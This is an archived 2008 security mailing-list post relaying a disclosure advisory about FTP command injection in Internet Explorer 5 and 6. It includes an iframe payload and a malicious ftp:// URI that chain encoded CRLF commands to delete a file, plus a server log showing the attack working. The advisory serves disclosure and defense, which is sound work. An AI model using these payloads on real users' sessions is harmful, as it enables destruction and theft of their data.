Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Microsoft Internet Explorer FTP Command Injection Vulnerability

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Microsoft Internet Explorer FTP Command Injection Vulnerability
Date: 12 Mar 2008 11:02:04 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Microsoft Internet Explorer FTP Command Injection Vulnerability
------------------------------------------------------------------------


SUMMARY

Internet Explorer 5 and 6 are vulnerable to a File Transfer Protocol (FTP) 
CSRF-like command injection attack, whereby an attacker could execute 
arbitrary commands on an unsuspecting user's authenticated or 
unauthenticated FTP session. An attacker could delete, rename, move, and 
possibly steal data and upload malicious files to an FTP server under the 
attacker's control, on behalf of the user.

DETAILS

Vulnerable Systems:
 * Internet Explorer 6 (all versions)
 * Internet Explorer 5 (all versions)

Immune Systems:
 * Internet Explorer 7

The error occurs when a user visits a page containing a malicious FTP URL. 
Internet Explorer 5 and 6 decode and do not properly sanitize the supplied 
URL. It is possible to force Internet Explorer to chain FTP commands 
together by inserting URL encoded CRLF pairs after each command in the URL 
supplied by an HTML element.

<iframe src="ftp://user@site:port/%0D%0ADELE%20foo.txt%0D%0A"/>

Moreover, if two forward slashes are appended to the end of the malicious 
URL, Internet Explorer will attempt to use an already pre-authenticated 
connection established earlier by the user in the same browser session.

If the user has a pre-authenticated connection to an FTP server, an 
attacker, knowing the username and endpoint of that pre-authenticated 
connection, could piggyback on the user's session to execute arbitrary 
commands. A pre-authenticated connection is not necessary to carry out 
this attack, as Internet Explorer will attempt an anonymous login if no 
username is specified in the URL. If only the username is specified and no 
trailing forward slashes are appended to the string, Internet Explorer 
will send the username with a blank password (which may be sufficient for 
more obscure anonymous user accounts). If no username is specified, 
Internet Explorer will attempt to login using the 'IEUser@' user.

Successful execution of some attacks may depend on the command tokenizing 
strategy used by the target FTP server and the security configuration on 
the FTP server (for instance, most FTP servers do not allow PORT requests 
for endpoints which do not have the same address as the requesting 
client). In testing, Internet Explorer 6 SP2 required the two trailing 
forward slashes for the exploit to work correctly. Internet Explorer 6 SP1 
did not have this restriction. Internet Explorer 7 is not vulnerable to 
this issue, as it correctly sanitizes the URL before attempting to make 
the request on the FTP server.

Demonstration of the exploit piggybacking on a pre-authenticated 
connection (malicious URL with two trailing forward slashes) with IE6 SP2:

Malicious URI: ftp://admin@10.2.45.237/%0D%0ADELE%20foo.txt%0D%0ACWD//

 --> Welcome banner
 220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 2007) 
ready.
 
 <-- IE6 Requests a user
 USER admin
 
 --> FTP server requires password
 331 Password required for admin.
 
 <-- IE6 supplies password.
 PASS admin
 
 --> FTP Server responds with successful login.
 230 User admin logged in.
 
 <-- IE6 tests 'OPTS UTF8' option.
 opts utf8 on
 
 --> Server responds with negative permanent reply to OPTS request.
 500 'OPTS utf8 on': command not understood.
 
 <-- IE6 asks for the present working directory.
 PWD
 
 --> Server sends positive completion reply for PWD.
 257 "/home/admin" is current directory.
 
 <-- IE6 requests malicious FTP URI from an iframe in HTML doc
 CWD /home/admin/
 DELE foo.txt
 CWD/
 
 --> Server responds with positive completion for CWD
 250 CWD command successful.
 
 <-- IE6 sends a 'TYPE A' request
 TYPE A
 
 --> Server responds with positive completion for DELE
 250 DELE command successful.
 
 <-- IE6 sends a NOOP.
 noop
 
 --> Server sends negative permanent response for last (invalid) command.
 500 'CWD/': command not understood.

And the file no longer exists.

Vendor status and information:
Microsoft was notified of this vulnerability on January 22, 2008. They 
acknowledged the vulnerability on February 7, 2008 and were given 30 days 
to provide fix information.

Solution:
The vendor plans to release a patch for this issue in an upcoming security 
bulletin. If possible, upgrade to Internet Explorer 7.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:advisory@rapid7.com> Derek 
Abdine of Rapid7.
The original article can be found at:  
<http://www.rapid7.com/advisories/R7-0032> 
http://www.rapid7.com/advisories/R7-0032



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Microsoft Internet Explorer FTP Command Injection Vulnerability, SecuriTeam <=
Previous by Date:  [NT] Vulnerabilities in Microsoft Excel Allows Code Execution (MS08-014), SecuriTeam
Next by Date:  [UNIX] SAP MaxDB sdbstarter Privilege Escalation Vulnerability, SecuriTeam
Previous by Thread:  [NT] Vulnerabilities in Microsoft Excel Allows Code Execution (MS08-014), SecuriTeam
Next by Thread:  [UNIX] SAP MaxDB sdbstarter Privilege Escalation Vulnerability, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]